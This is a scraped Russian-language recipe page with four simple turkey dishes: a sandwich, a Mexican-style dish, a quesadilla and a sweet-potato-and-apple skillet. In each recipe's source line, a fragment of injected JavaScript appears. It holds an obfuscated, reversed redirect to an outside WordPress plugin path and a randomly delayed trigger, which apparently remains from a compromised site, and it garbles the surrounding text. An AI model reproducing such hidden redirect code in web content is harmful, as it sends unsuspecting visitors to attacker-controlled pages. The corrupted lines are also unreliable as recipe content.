Вкусные блюда из индейки на каждый день

Перед вами простые рецепты блюд из индейки, которые можно готовить хоть каждый день. Они точно не отнимут много времени, к тому же невероятно вкусные. Индейку не обязательно разделывать самим: вы прекрасно обойдётесь уже готовым филе, которое продаётся ломтиками.

Сэндвич с индейкой и козьим сыром

Вкусные блюда из индейки на каждый день. Изображение номер 1

http://www.fitnessmagazine.com

Вкусные блюда из индейки на каждый день

СЛОЖНОСТЬ РЕЦЕПТА:

ВРЕМЯ ПРИГОТОВЛЕНИЯ:

25 МИНУТ

КОЛИЧЕСТВО ПОРЦИЙ:

не указано

КАЛОРИЙНОСТЬ:

не указана

0 calories

Рецпет с сайта fitoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to-nyashka.ru

PT1H

PT1H

Ингредиенты

Руккола

100 г

Вода

1 ст. л.

Индейка

240 г

Цельнозерновой хлеб

4 шт.

Козий сыр

120 г

Гранатовый соус

4 ст. л.

Сварите филе индейки или купите уже готовые ломтики. Рукколу промойте, поместите в миску и на 1,5 минуты отправьте в микроволновку. Перекиньте её в дуршлаг и дайте остыть. Выдавите из рукколы лишнюю воду и мелко нарежьте её на доске. Сделайте тосты из цельнозернового хлеба. Дальше строим вот такую башенку: хлеб, козий сыр, ломтик варёной индейки, руккола, снова ломтик индейки, а затем снова сыр. Закрываем это великолепие вторым куском хлеба. Готово!

Индейка по-мексикански

Вкусные блюда из индейки на каждый день. Изображение номер 2

Вкусные блюда из индейки на каждый день

СЛОЖНОСТЬ РЕЦЕПТА:

ВРЕМЯ ПРИГОТОВЛЕНИЯ:

35 МИНУТ

КОЛИЧЕСТВО ПОРЦИЙ:

не указано

КАЛОРИЙНОСТЬ:

не указана

0 calories

Рецпет с сайта fitoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to-nyashka.ru

PT1H

PT1H

Ингредиенты

Помидор

1 шт.

Лук

1 шт.

Готовая индейка

360 г

Кукурузные лепёшки

8 шт.

Сметана

2 ст. л.

Кинза

2 ст. л.

Авокадо

1 шт.

Соус сальса

8 ст. л.

Салат ромэн

200 г

Тёртый сыр чеддер

100 г

Сварите филе индейки (опять же, можно купить готовые ломтики!). Тушите помидоры (можно взять консервированные) вместе с нарезанным луком на среднем огне 15—20 минут. Добавьте в сковороду филе индейки и томите содержимое ещё 3 минуты, пока мясо снова не станет горячим. Сбрызните кукурузные лепёшки оливковым маслом и отправьте их в духовку ещё на пару минут, пока они не станут коричневыми. Авокадо очистите и пюрируйте его мякоть, затем смешайте её с соусом сальса, сметаной и рубленой кинзой. Заправьте лепёшки этой смесью, добавьте в них содержимое сковородки. Нарежьте (а лучше порвите) салат и добавьте его в лепёшку. Посыпьте её тёртым сыром и ешьте уже!

Кесадилья с индейкой

Вкусные блюда из индейки на каждый день. Изображение номер 3

http://www.fitnessmagazine.com

Вкусные блюда из индейки на каждый день

СЛОЖНОСТЬ РЕЦЕПТА:

ВРЕМЯ ПРИГОТОВЛЕНИЯ:

35 МИНУТ

КОЛИЧЕСТВО ПОРЦИЙ:

не указано

КАЛОРИЙНОСТЬ:

не указана

0 calories

Рецпет с сайта fitoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to-nyashka.ru

PT1H

PT1H

Ингредиенты

Красный лук

1 шт.

Бальзамический уксус

50 г

Тортильи

2 шт.

Тёртый сыр чеддер

200 г

Филе индейки (можно готовое)

8 ломтиков

В миске замаринуйте лук в бальзамико на 7—10 минут. Пока лук маринуется, подогрейте на сковороде лепёшки тортильи (без масла). Сейчас же посыпьте каждую лепёшку сыром, а затем положите сверху ломтик индейки и лук. Сложите тортилью пополам (или закрепите края с помощью шпажки) и ждите, пока расплавится сыр. Поджарьте каждую тортилью с двух сторон. Очень простой рецепт и вкусное блюдо.

Индейка по-турецки

Вкусные блюда из индейки на каждый день. Изображение номер 4

http://www.fitnessmagazine.com

Вкусные блюда из индейки на каждый день

СЛОЖНОСТЬ РЕЦЕПТА:

ВРЕМЯ ПРИГОТОВЛЕНИЯ:

35 МИНУТ

КОЛИЧЕСТВО ПОРЦИЙ:

не указано

КАЛОРИЙНОСТЬ:

не указана

0 calories

Рецпет с сайта fitoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to-nyashka.ru

PT1H

PT1H

Ингредиенты

Картофель сладкий

2 шт.

Яблоко

1 шт.

Сметана

100 мл

Лимонный сок

1 ч. л.

Лук

1 шт.

Ломтики готовой индейки

600 г

Тимьян

1 ст. л.

Соль, перец

по вкусу

Поставьте кастрюлю с водой на огонь, бросьте в неё картофель, посолите и доведите до кипения. Уже после того как вода закипит, подождите ещё 3 минуты и добавьте в кастрюлю яблочные дольки. Варите 2—3 минуты на среднем огне, а затем слейте воду. Смешайте сметану с лимонным соком и специями. Лук нарежьте и обжарьте до мягкости в течение 2—3 минут на сковороде в масле. Добавьте индейку и подождите 3 минуты — она должна стать тёпленькой. Положите в сковородку картофель и яблоки, обжаривайте их до тех пор, пока они не подрумянятся. Наше блюдо готово!

Оцените статью
Дежурная Качалка
Добавить комментарии

;-) :| :x :twisted: :smile: :shock: :sad: :roll: :razz: :oops: :o :mrgreen: :lol: :idea: :grin: :evil: :cry: :cool: :arrow: :???: :?: :!:

Adblock
detector